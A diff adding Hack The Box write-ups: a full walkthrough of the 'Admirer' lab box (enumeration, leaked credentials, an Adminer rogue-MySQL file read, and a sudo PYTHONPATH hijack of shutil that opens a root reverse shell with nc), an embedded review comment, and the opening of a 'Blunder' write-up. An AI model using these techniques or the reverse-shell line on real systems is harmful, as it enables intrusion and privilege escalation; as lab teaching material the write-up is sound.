+ | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
+ | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
+ |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ | http-robots.txt: 1 disallowed entry
+ |_/admin-dir
+ |_http-server-header: Apache/2.4.25 (Debian)
+ |_http-title: Admirer
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it:
+
+
+
+basic enumeration on this webpage doesn't give us anything, the /admin-dir directory gives us a 403 forbdiden error as our nmap scan hinted us towards. So let's try to list the other directories on this website using gobuster:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → gobuster dir -u http://10.10.10.187 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -t 50
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.187
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: php
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/31 13:07:07 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /index.php (Status: 200) [Size: 6051]
+ /assets (Status: 301) [Size: 313] [--> http://10.10.10.187/assets/]
+ /images (Status: 301) [Size: 313] [--> http://10.10.10.187/images/]
+ /server-status (Status: 403) [Size: 277]
+
+ ===============================================================
+ 2021/05/31 13:13:11 Finished
+ ===============================================================
+
+
+
+Now the trick here was not run gobuster from the root of the webserver, but from the **/admin-dir** directory that is supposed to be 403 forbidden.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php -t 50
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.187/admin-dir
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: php
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/31 13:14:57 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.htaccess (Status: 403) [Size: 277]
+ /.htpasswd (Status: 403) [Size: 277]
+ /.htpasswd.php (Status: 403) [Size: 277]
+ /.hta (Status: 403) [Size: 277]
+ /.htaccess.php (Status: 403) [Size: 277]
+ /.hta.php (Status: 403) [Size: 277]
+ **/contacts.txt (Status: 200) [Size: 350]
+ /credentials.txt (Status: 200) [Size: 136]**
+
+ ===============================================================
+ 2021/05/31 13:15:07 Finished
+ ===============================================================
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → curl http://10.10.10.187/robots.txt
+ User-agent: *
+
+ # This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
+ Disallow: /admin-dir
+
+
+
+And here we see that we have been able to get access to 2 textfiles that, according to robots.txt wasn't possible to access, but it was! so let's see what we got:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → curl http://10.10.10.187/admin-dir/contacts.txt
+ ##########
+ # admins #
+ ##########
+ # Penny
+ Email: p.wise@admirer.htb
+
+
+ ##############
+ # developers #
+ ##############
+ # Rajesh
+ Email: r.nayyar@admirer.htb
+
+ # Amy
+ Email: a.bialik@admirer.htb
+
+ # Leonard
+ Email: l.galecki@admirer.htb
+
+
+
+ #############
+ # designers #
+ #############
+ # Howard
+ Email: h.helberg@admirer.htb
+
+ # Bernadette
+ Email: b.rauch@admirer.htb
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → curl http://10.10.10.187/admin-dir/credentials.txt
+ [Internal mail account]
+ w.cooper@admirer.htb
+ fgJr6q#S\W:$P
+
+ **[FTP account]
+ ftpuser
+ %n?4Wz}R$tTF7**
+
+ [Wordpress account]
+ admin
+ w0rdpr3ss01!
+
+
+
+So here we get a few usernames, and with passwords, let's take a look at the ftp service first:
+
+ 
+
+we download both files:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → ls -lash
+ total 5.1M
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K May 31 13:46 .
+ 4.0K drwxr-xr-x 11 nothing nothing 4.0K May 31 11:40 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 3.4K May 31 13:46 dump.sql
+ 5.1M -rw-r--r-- 1 nothing nothing 5.1M May 31 13:46 html.tar.gz
+
+
+Let's take a look at the sql file we found:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → cat dump.sql
+ -- MySQL dump 10.16 Distrib 10.1.41-MariaDB, for debian-linux-gnu (x86_64)
+ --
+ -- Host: localhost Database: admirerdb
+ -- ------------------------------------------------------
+ -- Server version 10.1.41-MariaDB-0+deb9u1
+
+ /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
+ /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
+ /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
+ /*!40101 SET NAMES utf8mb4 */;
+ /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
+ /*!40103 SET TIME_ZONE='+00:00' */;
+ /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
+ /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
+ /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
+ /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
+
+ --
+ -- Table structure for table `items`
+ --
+
+ DROP TABLE IF EXISTS `items`;
+ /*!40101 SET @saved_cs_client = @@character_set_client */;
+ /*!40101 SET character_set_client = utf8 */;
+ CREATE TABLE `items` (
+ `id` int(11) NOT NULL AUTO_INCREMENT,
+ `thumb_path` text NOT NULL,
+ `image_path` text NOT NULL,
+ `title` text NOT NULL,
+ `text` text,
+ PRIMARY KEY (`id`)
+ ) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb4;
+ /*!40101 SET character_set_client = @saved_cs_client */;
+
+ --
+ -- Dumping data for table `items`
+ --
+
+ LOCK TABLES `items` WRITE;
+ /*!40000 ALTER TABLE `items` DISABLE KEYS */;
+ INSERT INTO `items` VALUES (1,'images/thumbs/thmb_art01.jpg','images/fulls/art01.jpg','Visual Art','A pure showcase of skill and emotion.'),(2,'images/thumbs/thmb_eng02.jpg','images/fulls/eng02.jpg','The Beauty and the Beast','Besides the technology, there is also the eye candy...'),(3,'images/thumbs/thmb_nat01.jpg','images/fulls/nat01.jpg','The uncontrollable lightshow','When the sun decides to play at night.'),(4,'images/thumbs/thmb_arch02.jpg','images/fulls/arch02.jpg','Nearly Monochromatic','One could simply spend hours looking at this indoor square.'),(5,'images/thumbs/thmb_mind01.jpg','images/fulls/mind01.jpg','Way ahead of his time','You probably still use some of his inventions... 500yrs later.'),(6,'images/thumbs/thmb_mus02.jpg','images/fulls/mus02.jpg','The outcomes of complexity','Seriously, listen to Dust in Interstellar\'s OST. Thank me later.'),(7,'images/thumbs/thmb_arch01.jpg','images/fulls/arch01.jpg','Back to basics','And centuries later, we want to go back and live in nature... Sort of.'),(8,'images/thumbs/thmb_mind02.jpg','images/fulls/mind02.jpg','We need him back','He might have been a loner who allegedly slept with a pigeon, but that brain...'),(9,'images/thumbs/thmb_eng01.jpg','images/fulls/eng01.jpg','In the name of Science','Some theories need to be proven.'),(10,'images/thumbs/thmb_mus01.jpg','images/fulls/mus01.jpg','Equal Temperament','Because without him, music would not exist (as we know it today).');
+ /*!40000 ALTER TABLE `items` ENABLE KEYS */;
+ UNLOCK TABLES;
+ /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
+
+ /*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
+ /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
+ /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
+ /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
+ /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
+ /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
+ /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
+
+ -- Dump completed on 2019-12-02 20:24:15
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → tar -xvf html.tar.gz
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → tree
+ .
+ ├── assets
+ │ ├── css
+ │ │ ├── fontawesome-all.min.css
+ │ │ ├── images
+ │ │ │ ├── arrow.svg
+ │ │ │ ├── close.svg
+ │ │ │ └── spinner.svg
+ │ │ ├── main.css
+ │ │ └── noscript.css
+ │ ├── js
+ │ │ ├── breakpoints.min.js
+ │ │ ├── browser.min.js
+ │ │ ├── jquery.min.js
+ │ │ ├── jquery.poptrox.min.js
+ │ │ ├── main.js
+ │ │ └── util.js
+ │ ├── sass
+ │ │ ├── base
+ │ │ │ ├── _page.scss
+ │ │ │ ├── _reset.scss
+ │ │ │ └── _typography.scss
+ │ │ ├── components
+ │ │ │ ├── _actions.scss
+ │ │ │ ├── _button.scss
+ │ │ │ ├── _form.scss
+ │ │ │ ├── _icon.scss
+ │ │ │ ├── _icons.scss
+ │ │ │ ├── _list.scss
+ │ │ │ ├── _panel.scss
+ │ │ │ ├── _poptrox-popup.scss
+ │ │ │ └── _table.scss
+ │ │ ├── layout
+ │ │ │ ├── _footer.scss
+ │ │ │ ├── _header.scss
+ │ │ │ ├── _main.scss
+ │ │ │ └── _wrapper.scss
+ │ │ ├── libs
+ │ │ │ ├── _breakpoints.scss
+ │ │ │ ├── _functions.scss
+ │ │ │ ├── _mixins.scss
+ │ │ │ ├── _vars.scss
+ │ │ │ └── _vendor.scss
+ │ │ ├── main.scss
+ │ │ └── noscript.scss
+ │ └── webfonts
+ │ ├── fa-brands-400.eot
+ │ ├── fa-brands-400.svg
+ │ ├── fa-brands-400.ttf
+ │ ├── fa-brands-400.woff
+ │ ├── fa-brands-400.woff2
+ │ ├── fa-regular-400.eot
+ │ ├── fa-regular-400.svg
+ │ ├── fa-regular-400.ttf
+ │ ├── fa-regular-400.woff
+ │ ├── fa-regular-400.woff2
+ │ ├── fa-solid-900.eot
+ │ ├── fa-solid-900.svg
+ │ ├── fa-solid-900.ttf
+ │ ├── fa-solid-900.woff
+ │ └── fa-solid-900.woff2
+ ├── dump.sql
+ ├── html.tar.gz
+ ├── images
+ │ ├── fulls
+ │ │ ├── arch01.jpg
+ │ │ ├── arch02.jpg
+ │ │ ├── art01.jpg
+ │ │ ├── art02.jpg
+ │ │ ├── eng01.jpg
+ │ │ ├── eng02.jpg
+ │ │ ├── mind01.jpg
+ │ │ ├── mind02.jpg
+ │ │ ├── mus01.jpg
+ │ │ ├── mus02.jpg
+ │ │ ├── nat01.jpg
+ │ │ └── nat02.jpg
+ │ └── thumbs
+ │ ├── thmb_arch01.jpg
+ │ ├── thmb_arch02.jpg
+ │ ├── thmb_art01.jpg
+ │ ├── thmb_art02.jpg
+ │ ├── thmb_eng01.jpg
+ │ ├── thmb_eng02.jpg
+ │ ├── thmb_mind01.jpg
+ │ ├── thmb_mind02.jpg
+ │ ├── thmb_mus01.jpg
+ │ ├── thmb_mus02.jpg
+ │ ├── thmb_nat01.jpg
+ │ └── thmb_nat02.jpg
+ **├── index.php**
+ ├── robots.txt
+ ├── utility-scripts
+ │ ├── admin_tasks.php
+ │ ├── db_admin.php
+ │ ├── info.php
+ │ └── phptest.php
+ └── w4ld0s_s3cr3t_d1r
+ ├── contacts.txt
+ └── credentials.txt
+
+
+
+We take a look into index.php:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → cat index.php
+
+ [...]
+ <****?php
+ $servername = "localhost";
+ $username = "waldo";
+ $password = "]F7jLHw:*G>UPrTo}~A"d6b";
+ $dbname = "admirerdb";
+
+ [...]
+
+We have also found it using grep recursively:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → grep -ir password
+ **index.php: $password = "]F7jLHw:*G>UPrTo}~A"d6b";**
+ index.php: $conn = new mysqli($servername, $username, $password, $dbname);
+ **utility-scripts/db_admin.php: $password = "Wh3r3_1s_w4ld0?";**
+ utility-scripts/db_admin.php: $conn = new mysqli($servername, $username, $password);
+ assets/css/main.css: input[type="password"],
+ assets/css/main.css: input[type="password"]:invalid,
+ assets/css/main.css: input[type="password"]:focus,
+ assets/css/main.css: input[type="password"],
+
+ [...]
+
+
+
+Here we see yet another password **Wh3r3_1s_w4ld0**
+
+There is also info.php available onto the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → ls -lash utility-scripts
+ total 24K
+ 4.0K drwxr-x--- 2 nothing nothing 4.0K Dec 2 2019 .
+ 4.0K drwxr-xr-x 6 nothing nothing 4.0K May 31 13:55 ..
+ 4.0K -rw-r----- 1 nothing nothing 1.8K Dec 2 2019 admin_tasks.php
+ 4.0K -rw-r----- 1 nothing nothing 401 Dec 1 2019 db_admin.php
+ 4.0K -rw-r----- 1 nothing nothing 20 Nov 29 2019 info.php
+ 4.0K -rw-r----- 1 nothing nothing 53 Dec 2 2019 phptest.php
+
+
+
+` 
+
+So now we know that the server is running PHP version 7.0, but let's take a look at adnin_tasks.php:
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [HTB/Admirer/utility-scripts]
+ → cat admin_tasks.php | grep exec
+ echo str_replace("\n", "
+ ", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
+
+
+Which reveals us the admin_tasks.sh bashscript which is in the /opt/ directory so we can't read it's sourcecode yet. Now the trick here was that the utility-scripts directory does have an extra php file, and in order to find it we need to use a bigger wordlist against said directory:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [HTB/Admirer/utility-scripts]
+ → gobuster dir -u http://10.10.10.187/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/big.txt --extensions php,txt -t 50
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.187/utility-scripts/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: php,txt
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/31 15:49:44 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.htaccess.txt (Status: 403) [Size: 277]
+ /.htpasswd (Status: 403) [Size: 277]
+ /.htaccess (Status: 403) [Size: 277]
+ /.htpasswd.txt (Status: 403) [Size: 277]
+ /.htaccess.php (Status: 403) [Size: 277]
+ /.htpasswd.php (Status: 403) [Size: 277]
+ **/adminer.php (Status: 200) [Size: 4294]**
+ /info.php (Status: 200) [Size: 83771]
+ /phptest.php (Status: 200) [Size: 32]
+
+ ===============================================================
+ 2021/05/31 15:50:38 Finished
+ ===============================================================
+
+
+
+Which leads us to the **adminer** php webpage which we didn't see before in the html tar gz file:
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [HTB/Admirer/utility-scripts]
+ → searchsploit adminer
+ -------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ -------------------------------------------- ---------------------------------
+ Adminer 4.3.1 - Server-Side Request Forgery | php/webapps/43593.txt
+ -------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+now that we know that there is an exploit for this service:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [HTB/Admirer/utility-scripts]
+ → cat $(locate 43593.txt)
+
+
+
+But we can also find it [here](https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability):
+
+ 
+
+Looking at this blogpost, we already found adminer.php on the system, and what's left to do is to create our own malicious MySQL server since external connections should be possible. So let's try it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → sudo apt install mariadb-server mariadb-client
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → sudo systemctl start mariadb
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → mysql -u root -p
+ Enter password:
+ ERROR 1698 (28000): Access denied for user 'root'@'localhost'
+
+
+That's because you need to be the root user to setup mysql:
+
+
+ ┌──(root💀nowhere)-[~]
+ └─# mysql -u root -p
+ Enter password:
+ Welcome to the MariaDB monitor. Commands end with ; or \g.
+ Your MariaDB connection id is 57
+ Server version: 10.5.9-MariaDB-1 Debian buildd-unstable
+
+ Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ MariaDB [(none)]>
+
+
+Now let's setup our database:
+
+
+ MariaDB [(none)]> ALTER USER 'root'@'localhost' IDENTIFIED BY 'P@SSW0RD';
+ Query OK, 0 rows affected (0.004 sec)
+
+ MariaDB [(none)]> CREATE DATABASE backup; USE backup; CREATETABLE backup (name VARCHAR(2000));
+ Query OK, 1 row affected (0.000 sec)
+
+ MariaDB [backup]> CREATE DATABASE backup; USE backup; CREATE TABLE backup (name VARCHAR(2000));
+ ERROR 1007 (HY000): Can't create database 'backup'; database exists
+ Database changed
+ Query OK, 0 rows affected (0.029 sec)
+
+ MariaDB [backup]> CREATE USER 'backup'@'10.10.10.187' IDENTIFIED BY 'P@SSW0RD';
+ Query OK, 0 rows affected (0.004 sec)
+
+ MariaDB [backup]> GRANT ALL PRIVILEGES ON backup.* TO 'backup'@'10.10.10.187';
+ Query OK, 0 rows affected (0.004 sec)
+
+
+once that's done, we make sure that our mysql instance can communicate to our tun0 interface:
+
+
+ MariaDB [backup]> exit;
+ Bye
+
+ ┌──(root💀nowhere)-[~]
+ └─# vim /etc/mysql/mariadb.conf.d/50-server.cnf
+
+ [...]
+
+ bind-address = 10.10.14.13 # and not 127.0.0.1
+
+ [...]
+
+ :wq
+
+ ┌──(root💀nowhere)-[~]
+ └─# systemctl restart mariadb
+
+
+Once we restarted mariadb we see that we can see that our mysql port is up and running for our htb ip:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Admirer]
+ → nmap -p 3306 10.10.14.13
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 17:58 CEST
+ Nmap scan report for 10.10.14.13
+ Host is up (0.000050s latency).
+
+ PORT STATE SERVICE
+ 3306/tcp open mysql
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
+
+
+
+` 
+
+After logging in, go to the SQL command pane:
+
+
+
+Next step is to make use of the **load data** function to examine files on the machine:
+
+
+ load data local infile '../index.php'
+ into table backup
+ fields terminated by "/n"
+
+
+
+`  
+
+and now the index.php file got imported into the backup mysql database, so we simply check it's structure to see it's contents:
+
+
+
+And we got waldo's credentials ! **waldo: &<****h5b~yK3F#{PaPB &dA;}{H>**, so let's login as waldo via ssh:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Admirer]
+ → ssh waldo@10.10.10.187
+ The authenticity of host '10.10.10.187 (10.10.10.187)' can't be established.
+ ECDSA key fingerprint is SHA256:NSIaytJ0GOq4AaLY0wPFdPsnuw/wBUt2SvaCdiFM8xI.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.187' (ECDSA) to the list of known hosts.
+ waldo@10.10.10.187's password:
+ Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux
+
+ The programs included with the Devuan GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ You have new mail.
+ Last login: Wed Apr 29 10:56:59 2020 from 10.10.14.3
+ waldo@admirer:~$ id
+ uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)
+ waldo@admirer:~$ cat user.txt
+ 3cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+to privesc to the root user, we first need to run linpeas.sh to enumerate the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Admirer]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Admirer]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ waldo@admirer:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/linpeas.sh
+ --2021-05-31 19:54:54-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/linpeas.sh’
+
+ /tmp/linpeas.sh 100%[==========================================================================================================================================================>] 333.85K 701KB/s in 0.5s
+
+ 2021-05-31 19:54:55 (701 KB/s) - ‘/tmp/linpeas.sh’ saved [341863/341863]
+
+ waldo@admirer:~$ chmod +x /tmp/linpeas.sh
+ waldo@admirer:~$ /tmp/linpeas.sh
+
+
+
+` 
+
+And searching through it we get hinted towards the **admin_tasks.sh** script we heard of earlier:
+
+
+ waldo@admirer:~$ sudo -l
+ [sudo] password for waldo:
+ Matching Defaults entries for waldo on admirer:
+ env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
+
+ User waldo may run the following commands on admirer:
+ (ALL) SETENV: /opt/scripts/admin_tasks.sh
+
+
+
+So let's see what it does:
+
+
+ waldo@admirer:~$ cat /opt/scripts/admin_tasks.sh
+ #!/bin/bash
+
+ view_uptime()
+ {
+ /usr/bin/uptime -p
+ }
+
+ view_users()
+ {
+ /usr/bin/w
+ }
+
+ view_crontab()
+ {
+ /usr/bin/crontab -l
+ }
+
+ backup_passwd()
+ {
+ if [ "$EUID" -eq 0 ]
+ then
+ echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
+ /bin/cp /etc/passwd /var/backups/passwd.bak
+ /bin/chown root:root /var/backups/passwd.bak
+ /bin/chmod 600 /var/backups/passwd.bak
+ echo "Done."
+ else
+ echo "Insufficient privileges to perform the selected operation."
+ fi
+ }
+
+ backup_shadow()
+ {
+ if [ "$EUID" -eq 0 ]
+ then
+ echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
+ /bin/cp /etc/shadow /var/backups/shadow.bak
+ /bin/chown root:shadow /var/backups/shadow.bak
+ /bin/chmod 600 /var/backups/shadow.bak
+ echo "Done."
+ else
+ echo "Insufficient privileges to perform the selected operation."
+ fi
+ }
+
+ backup_web()
+ {
+ if [ "$EUID" -eq 0 ]
+ then
+ echo "Running backup script in the background, it might take a while..."
+ **/opt/scripts/backup.py &**
+ else
+ echo "Insufficient privileges to perform the selected operation."
+ fi
+ }
+
+ [...]
+
+
+
+Here we see that the bashscript, which we can run as the root user through sudo, can call for a python script named **backup.py** from the **/opt/scripts/** directory. Therefore,
+
+
+ waldo@admirer:~$ which nc
+ /bin/nc
+
+ waldo@admirer:~$ cat /opt/scripts/backup.py
+ #!/usr/bin/python3
+
+ from shutil import make_archive
+
+ src = '/var/www/html/'
+
+ # old ftp directory, not used anymore
+ #dst = '/srv/ftp/html'
+
+ dst = '/var/backups/html'
+
+ make_archive(dst, 'gztar', src)
+
+
+
+Since netcat is there on the box, We're going to perform a python library hijacking, and we're going to hijack the **shutil** library in particular:
+
+
+ waldo@admirer:~$ mkdir /tmp/nihilist777
+ waldo@admirer:~$ nano /tmp/nihilist777/shutil.py
+ waldo@admirer:~$ cat /tmp/nihilist777/shutil.py
+ import os
+
+ def make_archive(a,b,c):
+ os.system("nc 10.10.14.13 9001 -e '/bin/bash'")
+
+
+
+then we modify the value of the **PYTHONPATH** environment variable to access our **/tmp/nihilist777** directory:
+
+
+ waldo@admirer:~$ PYTHONPATH=/tmp/nihilist777
+ waldo@admirer:~$ echo $PYTHONPATH
+ /tmp/nihilist777
+
+ waldo@admirer:~$ sudo PYTHONPATH=/tmp/nihilist777 /opt/scripts/admin_tasks.sh
+ waldo@admirer:~$ sudo PYTHONPATH=/tmp/nihilist777 /opt/scripts/admin_tasks.sh
+ [sudo] password for waldo:
+
+ [[[ System Administration Menu ]]]
+ 1) View system uptime
+ 2) View logged in users
+ 3) View crontab
+ 4) Backup passwd file
+ 5) Backup shadow file
+ 6) Backup web data
+ 7) Backup DB
+ 8) Quit
+ Choose an option: 6
+
+ [ 10.10.14.13/23 ] [ /dev/pts/55 ] [~/HTB/Admirer]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.187] 42986
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ cat /root/root.txt
+ cdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get a reverse shell as the root user, and get the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
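Review bot: Part 3 shows the privilege escalation but never states its root cause, which is the `SETENV` tag in `(ALL) SETENV: /opt/scripts/admin_tasks.sh`: it lets waldo pass `PYTHONPATH=/tmp/nihilist777` through sudo into the root-run `backup.py`, which is why the replacement `shutil.py` is imported ahead of the standard library; add a sentence saying so, together with the mitigation (drop `SETENV` from the rule, or have the script invoke the backup with `python3 -I` or `-E` so `PYTHONPATH` is ignored). Smaller fixes in the same hunk: `adnin_tasks.php` should be `admin_tasks.php`; `CREATETABLE backup (name VARCHAR(2000))` in the first MariaDB command is missing a space, which is why the whole line is re-run and `CREATE DATABASE` then fails with `database exists`; `fields terminated by "/n"` is presumably meant to be `"\n"`; the `sudo PYTHONPATH=/tmp/nihilist777 /opt/scripts/admin_tasks.sh` line is duplicated, and the earlier unexported `PYTHONPATH=/tmp/nihilist777` assignment is redundant since the value is passed on the sudo line; the paragraph ending `Therefore,` is cut off; waldo's password is mangled by stray `**` markers; `it's sourcecode`, `it's structure` and `it's contents` should be `its`; and the lone backtick lines where screenshots belong are broken image embeds.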
diff --git a/Easy/47.md b/Easy/47.md
new file mode 100644
index 0000000..054a1ff
--- /dev/null
+++ b/Easy/47.md
@@ -0,0 +1,523 @@
+# Blunder Writeup
+
+
+
+## Introduction :
+
+Blunder is an Easy Linux box released back in May 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → nmap -vvv -p- 10.10.10.191 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.191
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → nmap -sCV -p 80 10.10.10.191
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 10:16 CEST
+ Nmap scan report for 10.10.10.191
+ Host is up (0.036s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-generator: Blunder
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Blunder | A blunder of interesting facts
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's examine it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [Nextcloud/blog]
+ → gobuster dir -u http://10.10.10.191 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -x txt,pdf,php,html
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.191
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
